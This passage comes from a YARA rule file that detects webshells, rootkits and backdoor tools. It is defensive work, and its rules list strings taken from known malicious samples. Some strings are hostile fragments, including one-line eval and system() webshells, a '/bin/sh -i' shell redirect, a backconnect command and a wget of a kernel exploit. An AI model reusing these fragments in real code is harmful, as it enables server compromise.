	$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"" fullword
	$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
	$s4 = "Writed by DreAmeRz" fullword
condition:
	1 of them
}
rule Php_Webshell_DTool_Pro_php
{
strings:
	$s0 = "r3v3ng4ns\\nDigite"
	$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
	$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
condition:
	1 of them
}
rule Php_Webshell_telnetd_pl
{
strings:
	$s0 = "0ldW0lf" fullword
	$s1 = "However you are lucky :P"
	$s2 = "I'm FuCKeD"
	$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
	$s4 = "atrix@irc.brasnet.org"
condition:
	1 of them
}
rule Php_Webshell_php_include_w_shell_php
{
strings:
	$s0 = "$dataout .= \"
     \" : \"[admin\\@$ServerName $C"
condition:
	1 of them
}
rule Php_Webshell_ironshell_php
{
strings:
	$s0 = "www.ironwarez.info"
	$s1 = "$cookiename = \"wieeeee\";"
	$s2 = "~ Shell I"
	$s3 = "www.rootshell-team.info"
	$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
condition:
	1 of them
}
rule Php_Webshell_backdoorfr_php
{
strings:
	$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
	$s2 = "print(\"
    Provenance du mail :  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
condition:
	1 of them
}
rule Asp_Webshell_Ajan_asp
{
strings:
	$s1 = "c:\\downloaded.zip"
	$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
	$s3 = "http://www35.websamba.com/cybervurgun/"
condition:
	1 of them
}
rule Php_Webshell_PHANTASMA_php
{
strings:
	$s0 = ">[*] Safemode Mode Run"
	$s1 = "$file1 - $file2 -     $file
    "
	$s2 = "[*] Spawning Shell"
	$s3 = "Cha0s"
condition:
	2 of them
}
rule Php_Webshell_MySQL_Web_Interface_Version_0_8_php
{
strings:
	$s0 = "SooMin Kim"
	$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
	$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
	$s3 = "    		Type M  D unsignedzerofi"
condition:
	2 of them
}
rule Php_Webshell_simple_cmd_html
{
strings:
	$s1 = "G-Security Webshell" fullword
	$s2 = "\" " fullword
	$s3 = "" fullword
	$s4 = "" fullword
condition:
	all of them
}
rule Php_Webshell_1_c2007_php_php_c100_php
{
strings:
	$s0 = "echo \"Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
	$s3 = "echo \" Done!
    Total time (secs.): \".$ft"
	$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
condition:
	1 of them
}
rule Php_Webshell_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php
{
strings:
	$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
	$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
condition:
	1 of them
}
rule Php_Webshell_c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php
{
strings:
	$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
	$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
	$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
condition:
	2 of them
}
rule Php_Webshell_r577_php_php_spy_php_php_s_php_php
{
strings:
	$s2 = "echo $te.\"
    XXXX\" title=\"<%=SubFolder.Name%>\"> \" title=\"<%=File.Name%>\"> \" align=\"right\"><%=Attributes(SubFolder.Attributes)%>\">"
condition:
	all of them
}
rule Php_Webshell_byloader
{
strings:
	$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
	$s1 = "Failure ... Access is Denied !"
	$s2 = "NTFS Disk Driver Checking Service"
	$s3 = "Dumping Description to Registry..."
	$s4 = "Opening Service .... Failure !"
condition:
	all of them
}
rule Php_Webshell_shelltools_g0t_root_Fport
{
strings:
	$s4 = "Copyright 2000 by Foundstone, Inc."
	$s5 = "You must have administrator privileges to run fport - exiting..."
condition:
	all of them
}
rule Php_Webshell_BackDooR__fr_
{
strings:
	$s3 = "print(\"
    Exploit include "
condition:
	all of them
}
rule Php_Webshell_FSO_s_ntdaddy
{
strings:
	$s1 = "\"> &X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
condition:
	all of them
}
rule Php_Webshell_HYTop_DevPack_upload
{
strings:
	$s0 = ""
condition:
	all of them
}
rule Php_Webshell_PasswordReminder
{
strings:
	$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
condition:
	all of them
}
rule Php_Webshell_Pack_InjectT
{
strings:
	$s3 = "ail To Open Registry"
	$s4 = "32fDssignim"
	$s5 = "vide Internet S"
	$s6 = "d]Software\\M"
	$s7 = "TInject.Dll"
condition:
	all of them
}
rule Php_Webshell_FSO_s_RemExp_2
{
strings:
	$s2 = " Then Response.Write \""
	$s3 = ""
condition:
	all of them
}
rule Php_Webshell_FSO_s_c99
{
strings:
	$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
condition:
	all of them
}
rule Php_Webshell_rknt_zip_Folder_RkNT
{
strings:
	$s0 = "PathStripPathA"
	$s1 = "`cLGet!Addr%"
	$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
	$s3 = "oQToOemBuff* <="
	$s4 = "ionCdunAsw[Us'"
	$s6 = "CreateProcessW: %S"
	$s7 = "ImageDirectoryEntryToData"
condition:
	all of them
}
rule Php_Webshell_dbgntboot
{
strings:
	$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
	$s3 = "sth junk the M$ Wind0wZ retur"
condition:
	all of them
}
rule Php_Webshell_PHP_shell
{
strings:
	$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
	$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
condition:
	all of them
}
rule Php_Webshell_hxdef100
{
strings:
	$s0 = "RtlAnsiStringToUnicodeString"
	$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
	$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
condition:
	all of them
}
rule Php_Webshell_rdrbs100
{
strings:
	$s3 = "Server address must be IP in A.B.C.D format."
	$s4 = " mapped ports in the list. Currently "
condition:
	all of them
}
rule Php_Webshell_Mithril_Mithril
{
strings:
	$s0 = "OpenProcess error!"
	$s1 = "WriteProcessMemory error!"
	$s4 = "GetProcAddress error!"
	$s5 = "HHt`HHt\\"
	$s6 = "Cmaudi0"
	$s7 = "CreateRemoteThread error!"
	$s8 = "Kernel32"
	$s9 = "VirtualAllocEx error!"
condition:
	all of them
}
rule Php_Webshell_hxdef100_2
{
strings:
	$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
	$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
	$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
condition:
	all of them
}
rule Php_Webshell_Release_dllTest
{
strings:
	$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
	$s1 = "0 0&00060K0R0X0f0l0q0w0"
	$s2 = ": :$:(:,:0:4:8:D:`=d="
	$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
	$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
	$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
	$s6 = "0)0O0\\0a0o0\"1E1P1q1"
	$s7 = "<.\".ws(2).\"HDD Free : \".view_size($free).\" HDD Total : \".view_"
condition:
	all of them
}
rule Php_Webshell_Mithril_v1_45_dllTest
{
strings:
	$s3 = "syspath"
	$s4 = "\\Mithril"
	$s5 = "--list the services in the computer"
condition:
	all of them
}
rule Php_Webshell_dbgiis6cli
{
strings:
	$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
	$s5 = "###command:(NO more than 100 bytes!)"
condition:
	all of them
}
rule Php_Webshell_remview_2003_04_22
{
strings:
	$s1 = "\"\".mm(\"Eval PHP code\").\" (\".mm(\"don't type\").\" \\\"<?\\\""
condition:
	all of them
}
rule Php_Webshell_FSO_s_test
{
strings:
	$s0 = "$yazi = \"test\" . \"\\r\\n\";"
	$s2 = "fwrite ($fp, \"$yazi\");"
condition:
	all of them
}
rule Php_Webshell_Debug_cress
{
strings:
	$s0 = "\\Mithril "
	$s4 = "Mithril.exe"
condition:
	all of them
}
rule Php_Webshell_webshell
{
strings:
	$s0 = "RhViRYOzz"
	$s1 = "d\\O!jWW"
	$s2 = "bc!jWW"
	$s3 = "0W[&{l"
	$s4 = "[INhQ@\\"
condition:
	all of them
}
rule Php_Webshell_FSO_s_EFSO_2
{
strings:
	$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
	$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
condition:
	all of them
}
rule Php_Webshell_thelast_index3
{
strings:
	$s5 = "$err = \"Your Name Not Entered!Sorry, \\\"Your Name\\\" field is r"
condition:
	all of them
}
rule Php_Webshell_adjustcr
{
strings:
	$s0 = "$Info: This file is packed with the UPX executable packer $"
	$s2 = "$License: NRV for UPX is distributed under special license $"
	$s6 = "AdjustCR Carr"
	$s7 = "ION\\System\\FloatingPo"
condition:
	all of them
}
rule Php_Webshell_FeliksPack3___PHP_Shells_xIShell
{
strings:
	$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"
    		\")"
condition:
	all of them
}
rule Php_Webshell_EditServer_2
{
strings:
	$s0 = "@HOTMAIL.COM"
	$s1 = "Press Any Ke"
	$s3 = "glish MenuZ"
condition:
	all of them
}
rule Php_Webshell_by064cli
{
strings:
	$s7 = "packet dropped,redirecting"
	$s9 = "input the password(the default one is 'by')"
condition:
	all of them
}
rule Php_Webshell_Mithril_dllTest
{
strings:
	$s0 = "please enter the password:"
	$s3 = "\\dllTest.pdb"
condition:
	all of them
}
rule Php_Webshell_peek_a_boo
{
strings:
	$s0 = "__vbaHresultCheckObj"
	$s1 = "\\VB\\VB5.OLB"
	$s2 = "capGetDriverDescriptionA"
	$s3 = "__vbaExceptHandler"
	$s4 = "EVENT_SINK_Release"
	$s8 = "__vbaErrorOverflow"
condition:
	all of them
}
rule Php_Webshell_fmlibraryv3
{
strings:
	$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
condition:
	all of them
}
rule Php_Webshell_Debug_dllTest_2
{
strings:
	$s4 = "\\Debug\\dllTest.pdb"
	$s5 = "--list the services in the computer"
condition:
	all of them
}
rule Php_Webshell_connector
{
strings:
	$s2 = "If ( AttackID = BROADCAST_ATTACK )"
	$s4 = "Add UNIQUE ID for victims / zombies"
condition:
	all of them
}
rule Php_Webshell_shelltools_g0t_root_HideRun
{
strings:
	$s0 = "Usage -- hiderun [AppName]"
	$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
condition:
	all of them
}
rule Php_Webshell_PHP_Shell_v1_7
{
strings:
	$s8 = "[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
condition:
	all of them
}
rule Php_Webshell_xssshell_save
{
strings:
	$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
	$s5 = "VictimID = fm_NStr(Victims(i))"
condition:
	all of them
}
rule Php_Webshell_screencap
{
strings:
	$s0 = "GetDIBColorTable"
	$s1 = "Screen.bmp"
	$s2 = "CreateDCA"
condition:
	all of them
}
rule Php_Webshell_FSO_s_phpinj_2
{
strings:
	$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
condition:
	all of them
}
rule Php_Webshell_ZXshell2_0_rar_Folder_zxrecv
{
strings:
	$s0 = "RyFlushBuff"
	$s1 = "teToWideChar^FiYP"
	$s2 = "mdesc+8F D"
	$s3 = "\\von76std"
	$s4 = "5pur+virtul"
	$s5 = "- Kablto io"
	$s6 = "ac#f{lowi8a"
condition:
	all of them
}
rule Php_Webshell_FSO_s_ajan
{
strings:
	$s4 = "entrika.write \"BinaryStream.SaveToFile"
condition:
	all of them
}
rule Php_Webshell_c99shell
{
strings:
	$s0 = "<br />Input URL: <input name=\\\"uploadurl\\\" type=\\\"text\\\"&"
condition:
	all of them
}
rule Php_Webshell_phpspy_2005_full
{
strings:
	$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
condition:
	all of them
}
rule Php_Webshell_FSO_s_zehir4_2
{
strings:
	$s4 = "\"Program Files\\Serv-u\\Serv"
condition:
	all of them
}
rule Php_Webshell_FSO_s_indexer_2
{
strings:
	$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
condition:
	all of them
}
rule Php_Webshell_HYTop_DevPack_2005
{
strings:
	$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
	$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
	$s9 = "scrollbar-face-color:#E4E4F3;"
condition:
	all of them
}
rule Php_Webshell_root_040_zip_Folder_deploy
{
strings:
	$s5 = "halon synscan 127.0.0.1 1-65536"
	$s8 = "Obviously you replace the ip address with that of the target."
condition:
	all of them
}
rule Php_Webshell_by063cli
{
strings:
	$s2 = "#popmsghello,are you all right?"
	$s4 = "connect failed,check your network and remote ip."
condition:
	all of them
}
rule Asp_Webshell_icyfox007v1_10_rar_Folder_asp
{
strings:
	$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
condition:
	all of them
}
rule Php_Webshell_FSO_s_EFSO_2_2
{
strings:
	$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
	$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
condition:
	all of them
}
rule Php_Webshell_byshell063_ntboot_2
{
strings:
	$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
condition:
	all of them
}
rule Php_Webshell_u_uay
{
strings:
	$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
	$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
condition:
	1 of them
}
rule Php_Webshell_bin_wuaus
{
strings:
	$s1 = "9(90989@9V9^9f9n9v9"
	$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
	$s3 = ";(=@=G=O=T=X=\\="
	$s4 = "TCP Send Error!!"
	$s5 = "1\"1;1X1^1e1m1w1~1"
	$s8 = "=$=)=/=<=Y=_=j=p=z="
condition:
	all of them
}
rule Php_Webshell_pwreveal
{
strings:
	$s0 = "*<Blank - no es"
	$s3 = "JDiamondCS "
	$s8 = "sword set> [Leith=0 bytes]"
	$s9 = "ION\\System\\Floating-"
condition:
	all of them
}
rule Php_Webshell_shelltools_g0t_root_xwhois
{
strings:
	$s1 = "rting! "
	$s2 = "aTypCog("
	$s5 = "Diamond"
	$s6 = "r)r=rQreryr"
condition:
	all of them
}
rule Php_Webshell_vanquish_2
{
strings:
	$s2 = "Vanquish - DLL injection failed:"
condition:
	all of them
}
rule Php_Webshell_down_rar_Folder_down
{
strings:
	$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
condition:
	all of them
}
rule Php_Webshell_cmdShell
{
strings:
	$s1 = "if cmdPath=\"wscriptShell\" then"
condition:
	all of them
}
rule Php_Webshell_ZXshell2_0_rar_Folder_nc
{
strings:
	$s0 = "WSOCK32.dll"
	$s1 = "?bSUNKNOWNV"
	$s7 = "p@gram Jm6h)"
	$s8 = "ser32.dllCONFP@"
condition:
	all of them
}
rule Php_Webshell_portlessinst
{
strings:
	$s2 = "Fail To Open Registry"
	$s3 = "f<-WLEggDr\""
	$s6 = "oMemoryCreateP"
condition:
	all of them
}
rule Php_Webshell_SetupBDoor
{
strings:
	$s1 = "\\BDoor\\SetupBDoor"
condition:
	all of them
}
rule Php_Webshell_phpshell_3
{
strings:
	$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
	$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
condition:
	all of them
}
rule Php_Webshell_BIN_Server
{
strings:
	$s0 = "configserver"
	$s1 = "GetLogicalDrives"
	$s2 = "WinExec"
	$s4 = "fxftest"
	$s5 = "upfileok"
	$s7 = "upfileer"
condition:
	all of them
}
rule Php_Webshell_HYTop2006_rar_Folder_2006
{
strings:
	$s6 = "strBackDoor = strBackDoor "
condition:
	all of them
}
rule Php_Webshell_r57shell_3
{
strings:
	$s1 = "<b>\".$_POST['cmd']"
condition:
	all of them
}
rule Php_Webshell_HDConfig
{
strings:
	$s0 = "An encryption key is derived from the password hash. "
	$s3 = "A hash object has been created. "
	$s4 = "Error during CryptCreateHash!"
	$s5 = "A new key container has been created."
	$s6 = "The password has been added to the hash. "
condition:
	all of them
}
rule Php_Webshell_FSO_s_ajan_2
{
strings:
	$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
	$s3 = "/file.zip"
condition:
	all of them
}
rule Php_Webshell_Webshell_and_Exploit_CN_APT_HK
{
strings:
	$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
	$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
	$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
condition:
	$a0 or ( all of ($s*) )
}
rule Jsp_Webshell_JSP_Browser_APT_webshell
{
strings:
	$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
	$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
	$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
	$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
condition:
	all of them
}
rule Jsp_Webshell_JSP_jfigueiredo_APT_webshell
{
strings:
	$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
	$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
condition:
	all of them
}
rule Jsp_Webshell_JSP_jfigueiredo_APT_webshell_2
{
strings:
	$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
	$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
	$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
	$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
condition:
	all of ($a*) or all of ($s*)
}
rule Php_Webshell_Webshell_Insomnia
{
strings:
	$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
	$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
	$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
	$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
	$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
	$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
	$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
	$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
condition:
	3 of them
}
rule Php_Webshell_HawkEye_PHP_Panel
{
strings:
	$s0 = "$fname = $_GET['fname'];" ascii fullword
	$s1 = "$data = $_GET['data'];" ascii fullword
	$s2 = "unlink($fname);" ascii fullword
	$s3 = "echo \"Success\";" fullword ascii
condition:
	all of ($s*) and filesize < 600
}
rule Php_Webshell_SoakSoak_Infected_Wordpress
{
strings:
	$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
	$s1 = "function FuncQueueObject()" ascii fullword
	$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
condition:
	all of ($s*)
}
rule Php_Webshell_Pastebin_Webshell
{
strings:
	$s0 = "file_get_contents(\"http://pastebin.com" ascii
	$s1 = "xcurl('http://pastebin.com/download.php" ascii
	$s2 = "xcurl('http://pastebin.com/raw.php" ascii
	$x0 = "if($content){unlink('evex.php');" ascii
	$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
	$y0 = "file_put_contents($pth" ascii
	$y1 = "echo \"<login_ok>" ascii
	$y2 = "str_replace('* @package Wordpress',$temp" ascii
condition:
	1 of ($s*) or all of ($x*) or all of ($y*)
}
rule Asp_Webshell_ASPXspy2
{
strings:
	$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
	$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
	$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
	$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
	$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
	$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
	$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
	$s8 = "Copyright © 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
	$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
	$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
	$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
	$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
	$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
	$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
condition:
	6 of them
}
rule Php_Webshell_Webshell_27_9_c66_c99
{
strings:
	$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
	$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
	$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
condition:
	filesize < 685KB and 1 of them
}
rule Php_Webshell_Webshell_acid_AntiSecShell_3
{
strings:
	$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
	$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
condition:
	filesize < 900KB and all of them
}
rule Php_Webshell_Webshell_c99_4
{
strings:
	$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
	$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
	$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
	$s4 = "$ret = myshellexec($handler);" fullword ascii
	$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
condition:
	filesize < 900KB and 1 of them
}
rule Php_Webshell_Webshell_r57shell_2
{
strings:
	$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
	$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
condition:
	filesize < 900KB and all of them
}
rule Php_Webshell_Webshell_27_9_acid_c99_locus7s
{
strings:
	$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
	$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
condition:
	filesize < 1711KB and 1 of them
}
rule Php_Webshell_Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57
{
strings:
	$s1 = "$_POST['cmd'] = which('" ascii
	$s2 = "$blah = ex(" fullword ascii
condition:
	filesize < 600KB and all of them
}
rule Php_Webshell_Webshell_c100
{
strings:
	$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
	$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
	$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
	$s4 = "which wget curl w3m lynx" ascii
	$s6 = "netstat -atup | grep IST"  ascii
condition:
	filesize < 685KB and 2 of them
}
rule Php_Webshell_Webshell_AcidPoison
{
strings:
	$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
condition:
	filesize < 550KB and all of them
}
rule Php_Webshell_Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256
{
strings:
	$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
	$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
condition:
	filesize < 882KB and all of them
}
rule Php_Webshell_Webshell_Ayyildiz
{
strings:
	$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
	$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
condition:
	filesize < 112KB and all of them
}
rule Php_Webshell_Webshell_zehir
{
strings:
	$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
	$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
condition:
	filesize < 200KB and 1 of them
}
rule Php_Webshell_UploadShell_98038f1efa4203432349badabad76d44337319a6
{
strings:
	$s2 = "$lol = file_get_contents(\"../../../../../wp-config.php\");" fullword ascii
	$s6 = "@unlink(\"./export-check-settings.php\");" fullword ascii
	$s7 = "$xos = \"Safe-mode:[Safe-mode:\".$hsafemode.\"] " fullword ascii
condition:
	( uint16(0) == 0x3f3c and filesize < 6KB and ( all of ($s*) ) ) or ( all of them )
}
rule Php_Webshell_DKShell_f0772be3c95802a2d1e7a4a3f5a45dcdef6997f3
{
strings:
	$s1 = "<?php Error_Reporting(0); $s_pass = \"" ascii
	$s2 = "$s_func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on" ascii
condition:
	( uint16(0) == 0x3c0a and filesize < 300KB and all of them )
}
rule Php_Webshell_Unknown_8af033424f9590a15472a23cc3236e68070b952e
{
strings:
	$s1 = "$check = $_SERVER['DOCUMENT_ROOT']" fullword ascii
	$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
	$s3 = "fwrite($fp,base64_decode('" ascii
condition:
	( uint16(0) == 0x6324 and filesize < 6KB and ( all of ($s*) ) ) or ( all of them )
}
rule Php_Webshell_DkShell_4000bd83451f0d8501a9dfad60dce39e55ae167d
{
strings:
	$x1 = "DK Shell - Took the Best made it Better..!!" fullword ascii
	$x2 = "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x" ascii
	$x3 = "echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';" fullword ascii
	$s1 = "echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
	$s9 = "$x = $_GET[\"x\"];" fullword ascii
condition:
	( uint16(0) == 0x3f3c and filesize < 200KB and 1 of ($x*) ) or ( 3 of them )
}
rule Php_Webshell_WebShell_5786d7d9f4b0df731d79ed927fb5a124195fc901
{
strings:
	$s1 = "preg_replace(\"\\x2F\\x2E\\x2A\\x2F\\x65\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x" ascii
	$s2 = "input[type=text], input[type=password]{" fullword ascii
condition:
	( uint16(0) == 0x6c3c and filesize < 80KB and all of them )
}
